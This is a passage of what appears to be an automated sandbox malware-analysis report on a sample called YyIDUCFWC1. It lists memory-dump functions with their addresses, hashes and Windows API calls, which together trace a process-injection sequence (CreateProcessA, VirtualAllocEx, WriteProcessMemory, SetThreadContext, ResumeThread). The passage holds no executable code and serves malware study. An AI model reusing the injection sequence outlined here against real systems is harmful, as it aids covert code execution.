                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                                                              • Opcode ID: ce3ba4be9cc1bb4daf87e05504a6ec078d11a8d414948eac85d02782f5311435
                                                                                                                                                                                                                                              • Instruction ID: 4f68633db686a9a4ff0d34e370947697aea57e6f960d0404e4b07a3e38b323fa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce3ba4be9cc1bb4daf87e05504a6ec078d11a8d414948eac85d02782f5311435
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8321E675200109AFCB14DF89D890DAAB3BAFFCD254B248649E91A97354C731EE16CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05B00048 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1709698902.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b00000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: TJcq$Te^q
                                                                                                                                                                                                                                              • API String ID: 0-918715239
                                                                                                                                                                                                                                              • Opcode ID: c8d09727608f60c16aaa0f17c66d6c4bf79ee719efcfc1a08f7aa00425df7911
                                                                                                                                                                                                                                              • Instruction ID: b0dfce70228ba795bfc3c001b36d18684a071cc8fa9c271250d8143b44252fa9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8d09727608f60c16aaa0f17c66d6c4bf79ee719efcfc1a08f7aa00425df7911
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3311D330B101155BCB19EBB8D4587BFBBE6FBC9200F54056DD50A9B380CE315D0987E6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE8BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,6CEE6890,?), ref: 6CEE8BDD
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6CEE8C23
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                                                              • Opcode ID: 04b66fb6ee83bba03f95ec59af73c934b868231711acc35bad303e85552cc020
                                                                                                                                                                                                                                              • Instruction ID: 334da58863327df88c7865f38fb4f78a0cee22ca9189d45086ab95c991a6b45f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04b66fb6ee83bba03f95ec59af73c934b868231711acc35bad303e85552cc020
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46019A71705104AFC750DFACC88099AF7B9FB9D214720426AEA05C7700DB32ED61C7D1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0532BD24 Relevance: 1.8, APIs: 1, Instructions: 297processCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0532BFFF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                                                                              • Opcode ID: 7e3259fb5706c377c890e7316f96d7bc4e59e9a3c48494944336889cc8615ad8
                                                                                                                                                                                                                                              • Instruction ID: 65de37fbb9e04da105384359604be93d7b98d9404bc7a4b5f596dfba402520c7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e3259fb5706c377c890e7316f96d7bc4e59e9a3c48494944336889cc8615ad8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFB132B0D04668DFDB10CFA8C845BEEBBF1BB09304F149169E859A7290DB748985CF92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0532BD30 Relevance: 1.8, APIs: 1, Instructions: 295processCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0532BFFF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                                                                              • Opcode ID: 944ee20caf8c781dd23eada7f0782119d3fbd1f012d6616c0a7fd29620f93b0d
                                                                                                                                                                                                                                              • Instruction ID: 850fb481ea02afa2a005a3843be3d10aad76bbed7566502bc3a17284e891e79e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 944ee20caf8c781dd23eada7f0782119d3fbd1f012d6616c0a7fd29620f93b0d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EB123B0D04668DFDB10CFA8C845BEEFBB1BB09304F149169E859A7290DB749985CF92
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFE2CE Relevance: 1.7, APIs: 1, Instructions: 214COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1579825452-0
                                                                                                                                                                                                                                              • Opcode ID: e6824b51243679a79f8b48ce6c99e8d97ca2a911c578f7b0eab3032f1b17026f
                                                                                                                                                                                                                                              • Instruction ID: e6087a0e841e5ee6a80193c7c52d042fea93131dc8ed65f6b5da267916b52c0c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6824b51243679a79f8b48ce6c99e8d97ca2a911c578f7b0eab3032f1b17026f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D881D3B19057809FEB209FA4888174EB7F0BB41308F34497DD56D4BB90DBB5A64A8BD3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0532C450 Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0532C525
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                                                                              • Opcode ID: 1e2b3492f0e5208f620da3f85538aac1fcd48371c1be3e1fbbdc33b77b3c7ebb
                                                                                                                                                                                                                                              • Instruction ID: 446cb7cf17b320ffffe949a239deebde98fd80a74c67cde30b6aaf0239fe2485
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e2b3492f0e5208f620da3f85538aac1fcd48371c1be3e1fbbdc33b77b3c7ebb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A04159B5D042589FDF10CFA9D984AEEFBF5BB49310F24902AE818BB210D375A945CF64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0532C449 Relevance: 1.6, APIs: 1, Instructions: 114injectionCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0532C525
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                                                                              • Opcode ID: 1f1f72b7ae1102ceb92e1e4145578c2bc54da60f956f7c01907b5399f8911d55
                                                                                                                                                                                                                                              • Instruction ID: 7fc07b8da80268553f0f5b76cf2ffec36d2437b765df1c8681f30484a1a23962
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f1f72b7ae1102ceb92e1e4145578c2bc54da60f956f7c01907b5399f8911d55
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 414169B5D002589FDF00CFA9D984AEEFBF1BB09310F24902AE818B7210D374A945CF54
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0532C328 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0532C3DC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                              • Opcode ID: a55fff54f3f1dadfea89340578918d8296ab61ca86b82e3d897823258f5bff56
                                                                                                                                                                                                                                              • Instruction ID: 0cb7c4290888be44a3a4acebeba92b1443bd35e4e44446a1f540d051d8f7cc40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a55fff54f3f1dadfea89340578918d8296ab61ca86b82e3d897823258f5bff56
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 224158B9D052589FCF10CFA9D984A9EFBB5FB09310F14A41AE818B7214D375A941CB64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0532C330 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0532C3DC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                              • Opcode ID: c9dc6ab4843cb5fc25098fdfeaad2b34fc76452fd984ae38a9e067aab4523c55
                                                                                                                                                                                                                                              • Instruction ID: 1410d770706e2fff9c88dc0c25b741ee2078df421e34a0214c0aee2877b23308
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9dc6ab4843cb5fc25098fdfeaad2b34fc76452fd984ae38a9e067aab4523c55
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE3155B9D052589FCF10CFA9D984A9EFBF5BB09310F20A42AE818B7214D375A941CF64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE7140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF02820: _malloc.LIBCMT ref: 6CF02871
                                                                                                                                                                                                                                              • std::tr1::_Xweak.LIBCPMT ref: 6CEE71D2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xweak_mallocstd::tr1::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4085767713-0
                                                                                                                                                                                                                                              • Opcode ID: 900261a1b4cbb2e19f0f46c23a9c9e8c60902df05a21b4e58741ece383f9082b
                                                                                                                                                                                                                                              • Instruction ID: 3e693672e02a64a11656a95999fdf166d56b93bd734e7e185824cb0c025a30e8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 900261a1b4cbb2e19f0f46c23a9c9e8c60902df05a21b4e58741ece383f9082b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9831AFB5A0434A9FCB14CFA9C880EABB7F9FF48208F20861DE85597B41D731E905CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0532C229 Relevance: 1.6, APIs: 1, Instructions: 83threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0532C2BB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                                                                              • Opcode ID: 3b48b2e261394e9e419d0f558a3006f5dfba0f8bc59bc59477276714b90d740e
                                                                                                                                                                                                                                              • Instruction ID: 2f0f5bb3040fa87b082b1aed5fbd38645bbeac695e29b82512d1c55c323843b9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b48b2e261394e9e419d0f558a3006f5dfba0f8bc59bc59477276714b90d740e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE3199B9D012589FCF10CFA9E584ADEFBF4AB09310F24902AE818B7310D774AA44CF64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 053207C0 Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(?), ref: 0532242A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                                              • Opcode ID: f3950dbb3e7609b12fd60d445f8ef2a04c09c7c50f54ffc7b07290e58712bbf3
                                                                                                                                                                                                                                              • Instruction ID: 3784be6bb6ed4bf3baa976cb4ccee887741a3c0e9537fb34643cc2ed6d0331fd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3950dbb3e7609b12fd60d445f8ef2a04c09c7c50f54ffc7b07290e58712bbf3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D031BDB8D042589FCB14CFA9D984ADEFBF5AB49314F14906AE818B7320D374A941CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 053207CC Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(?), ref: 0532242A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                                              • Opcode ID: 7f3fc30cd8b707bfbaf7ac31771320628f075b108f0c79fe70ba288fdff6e622
                                                                                                                                                                                                                                              • Instruction ID: d00dfb7acde3553c32abde193a083f69bbe5c76b76e16501cd447101fb9444f3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f3fc30cd8b707bfbaf7ac31771320628f075b108f0c79fe70ba288fdff6e622
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD31BDB8D042589FCB14CFA9D884ADEFBF5AB49310F14906AE818B7320D374A941CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0532C230 Relevance: 1.6, APIs: 1, Instructions: 81threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0532C2BB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                                                                              • Opcode ID: 557acd406aad1465746f5a8e1d8b60271ce7b263a2eed87d03c0c214515207a5
                                                                                                                                                                                                                                              • Instruction ID: 8e472fb5dd6ef4adf385ad33f803d2bafb3157a7157013e956d5bc9e5757659f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 557acd406aad1465746f5a8e1d8b60271ce7b263a2eed87d03c0c214515207a5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF3199B5D012589FCF10CFA9E584ADEFBF4AB09310F24902AE418B7310D774AA44CF64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05322388 Relevance: 1.6, APIs: 1, Instructions: 78libraryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryW.KERNELBASE(?), ref: 0532242A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                                                                                              • Opcode ID: 5d89a2cae91e29ff215ee94c6ee528dbcd42b48f1b0ac896fd2f868fa9de0437
                                                                                                                                                                                                                                              • Instruction ID: 64b0a456e8f2fd209a20bb2452638342e311388b29385988e31441c9000ccd5a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d89a2cae91e29ff215ee94c6ee528dbcd42b48f1b0ac896fd2f868fa9de0437
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83319DB8D002589FCB14CFA9D984ADEFBF1BF49314F14906AE858B7220D774A945CF64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0532C5A0 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 0532C625
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1707775215.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5320000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                                                                              • Opcode ID: 255d3dcaa4c0b806a1e28e84b2e3322a804375493a3f27e67c019363012f4630
                                                                                                                                                                                                                                              • Instruction ID: edae14b77927dbe60bf5d2745d8edecb61eb68963f30f6a7e43d5d8da66b60f9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 255d3dcaa4c0b806a1e28e84b2e3322a804375493a3f27e67c019363012f4630
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A31ABB8D012589FCB10CFA9E585A9EFBF4BB09310F24902AE818B7310D734A940CF68
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 0532C5A8 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 0532C625
                                                                                                                                                                                                                                              Memory Dump Source
